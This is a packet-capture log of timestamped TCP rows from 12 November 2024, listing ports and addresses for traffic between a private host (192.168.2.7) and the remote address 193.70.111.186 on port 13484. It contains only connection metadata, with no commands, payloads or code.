Nov 12, 2024 18:45:30.424148083 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424156904 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424165964 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424607038 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424617052 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424621105 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424628973 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424643040 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424652100 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424660921 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424669981 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424679041 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424686909 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424695969 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424705029 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424714088 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424722910 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424731970 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424741030 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424751997 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424760103 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424768925 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424778938 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424787998 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424796104 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424804926 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424814939 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424824953 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424834967 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424843073 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424851894 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424860954 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425101042 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425111055 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425121069 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425129890 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425138950 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425148964 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425158024 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425167084 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425174952 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425184965 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425194025 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425204039 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425213099 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425221920 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425230980 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425239086 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425247908 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425256968 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425266981 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425276041 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425285101 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425292969 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425302029 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425311089 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425321102 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425338030 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425348043 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425358057 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425365925 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425374985 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425384045 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425396919 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425405979 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425414085 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425422907 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425431967 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425452948 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425462008 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425471067 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425479889 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425488949 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425497055 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425506115 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425537109 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425545931 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425554037 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425565004 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425573111 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425581932 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425590038 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425599098 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425694942 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425704956 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425713062 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425721884 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425730944 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425740957 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425750017 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425760031 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425767899 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425785065 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425795078 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425802946 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425812006 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425821066 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425829887 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425838947 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425868988 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425878048 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425887108 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425895929 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425905943 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425915003 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425923109 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425934076 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425950050 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.425957918 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426048040 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426058054 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426065922 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426074982 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426084995 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426094055 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426103115 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426115990 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426125050 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426134109 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426161051 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426171064 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426179886 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426187992 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426197052 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426213026 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426333904 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426343918 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426352978 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426362038 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426371098 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426381111 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426415920 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426424980 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426434040 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426443100 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426450968 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426461935 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426541090 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426549911 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426558018 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426572084 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426580906 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426589966 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426599026 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426608086 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426717997 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426728010 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426734924 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426744938 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426753998 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426763058 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426772118 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426780939 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426789999 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426800013 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426815987 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426825047 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426834106 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426842928 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426851988 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426861048 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426930904 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426939964 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426949024 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426956892 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426968098 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426976919 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426985979 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.426994085 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427002907 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427053928 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427062035 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427071095 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427078962 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427088022 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427097082 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427105904 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427114010 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427123070 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427133083 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427351952 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427361965 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427370071 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427378893 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427387953 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427397013 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427406073 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427416086 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427423954 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427433014 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427443981 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427452087 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427697897 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427706957 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427716970 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427726030 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427735090 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427742958 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427752972 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427762032 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427769899 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427781105 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427789927 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427798986 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.427808046 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428388119 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428396940 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428406000 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428415060 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428423882 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428433895 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428442955 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428452015 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428462029 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428472042 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428481102 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428489923 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428499937 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428508997 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428518057 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428529024 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428539038 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428548098 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428556919 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428565025 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428574085 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428584099 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428592920 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428601027 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428611994 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428622007 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428631067 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428638935 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428647995 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428656101 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428664923 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.428673983 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.429812908 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.429821968 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.429830074 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.429857016 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.429866076 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.429874897 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.429951906 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.429960012 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.429970026 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.429979086 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.430008888 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.430017948 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.430026054 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.430212021 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.430550098 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.430560112 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.430567980 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.430679083 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.431359053 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.431397915 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.431647062 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.431864977 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.431874990 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.431950092 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.431960106 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.431968927 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.431977987 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.431987047 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.431996107 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432004929 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432013988 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432023048 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432030916 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432040930 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432049036 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432058096 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432066917 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432082891 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432092905 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432106018 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432115078 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432123899 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432138920 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432147980 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432157040 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432171106 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432179928 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432188034 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432197094 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432559967 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432569027 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432579041 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432586908 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432595968 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432605028 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432614088 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432624102 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432632923 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432642937 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432651997 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432661057 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432670116 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432678938 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432688951 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.432698011 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:31.634689093 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:31.637212038 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:31.642436028 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:31.642527103 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:31.643147945 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:31.648109913 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:31.675555944 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:31.988410950 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:31.993325949 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:31.993354082 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:31.993362904 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:31.993374109 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:31.993382931 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:31.993407965 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:31.993427992 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:31.993453979 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:31.993473053 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:31.993774891 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:31.993786097 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:31.993794918 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:31.993803978 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:31.993846893 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:31.993869066 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:31.998454094 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:31.998465061 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:31.998542070 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:31.998549938 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:31.998599052 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:31.998611927 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:31.998646975 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:31.998665094 CET	13484	49790	193.70.111.186	192.168.2.7
